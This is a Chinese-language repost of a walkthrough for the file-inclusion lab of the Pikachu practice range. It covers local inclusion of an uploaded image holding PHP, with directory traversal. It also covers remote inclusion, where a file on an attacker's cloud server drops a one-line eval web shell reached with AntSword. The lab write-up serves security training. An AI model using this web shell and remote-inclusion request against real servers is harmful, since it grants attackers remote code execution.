欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 健康 > 养生 > pikachu文件包含漏洞靶场攻略

pikachu文件包含漏洞靶场攻略

2024/10/24 18:27:29 来源:https://blog.csdn.net/2401_82451607/article/details/141868046  浏览:    关键词:pikachu文件包含漏洞靶场攻略

一、本地文件包含

1.打开pikachu的本机包含文件靶场

2.随意提交查询

可以看到是get传参   可以在filename参数进行文件包含

3.准备好一个jpg文件

<?php phpinfo(); ?>将内容写到1.jpg中

点击上传文件 上传1.jpg

访问可以看到 已经上传成功

4.将我们上传的文件包含进来

使用../返回上级目录 来进行包含木马文件

可以发现我们写的phpinfo已经被包含了

二、远程文件包含

1.在云服务器上创建一个1.txt文件

<?php fputs(fopen("77.php","w"),'<?php eval($_POST["cmd"]);?>')?>

2.打开pikachu的远程文件包含

随便提交查询一个

可以看到get接受一个filename参数

3.将文件远程包含

在filename处修改为云服务器的目标地址

127.0.0.1/pika/vul/fileinclude/fi_remote.php?filename=http://云服务器IP/1.txt&submit=提交查询

虽然页面没有显示 但是在当前目录已经创建了77.php文件

4.使用蚁剑进行连接

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com